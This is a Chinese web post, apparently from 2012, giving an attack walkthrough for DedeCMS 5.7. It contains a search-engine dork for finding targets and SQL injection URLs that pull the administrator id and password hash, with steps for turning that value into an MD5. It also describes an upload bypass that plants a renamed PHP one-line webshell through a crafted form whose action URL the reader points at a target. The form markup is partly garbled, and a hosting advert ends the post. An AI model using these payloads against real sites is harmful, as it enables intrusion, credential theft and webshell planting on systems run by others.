dedecms5.7最新注入和上傳漏洞 |
發(fā)布時(shí)間: 2012/7/9 18:17:00 |
漏洞類型:注入漏洞、上傳漏洞
漏洞描述:百度搜索關(guān)鍵字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,獲得使用DeDeCMS系統(tǒng)的網(wǎng)站。 注入漏洞。首先訪問(wèn)“/data/admin/ver.txt”頁(yè)面獲取系統(tǒng)最后升級(jí)時(shí)間,然后訪問(wèn)“/member/ajax_membergroup.php?action=post&membergroup=1”頁(yè)面, 然后訪問(wèn)“/member/ajax_membergroup.php?action=post&membergroup=1”頁(yè)面,如圖說(shuō)明存在該漏洞。 然后寫(xiě)上語(yǔ)句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理員id /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理員密碼 得到的是19位的,去掉前三位和最后一位,得到管理員的16位MD5 上傳漏洞。要求網(wǎng)站開(kāi)啟新會(huì)員注冊(cè)功能,首先注冊(cè)新會(huì)員,無(wú)需通過(guò)郵件驗(yàn)證, 只要登陸會(huì)員中心,然后訪問(wèn)頁(yè)面鏈接 “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post” 說(shuō)明通過(guò)“/plus/carbuyaction.php”已經(jīng)成功調(diào)用了上傳頁(yè)面“/dialog/select_soft_post” 于是將Php一句話木馬擴(kuò)展名改為“rar”等,利用提交頁(yè)面upload1.htm <form action="=../dialog/select_soft_post] <[/url">http://www.webanqn.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
把url改成目標(biāo)url就行了。還有個(gè)全局變量提交,繞過(guò)注冊(cè)的可以去黑防2月刊上面看。 本文出自:億恩科技【www.riomediacenter.com】 服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM] |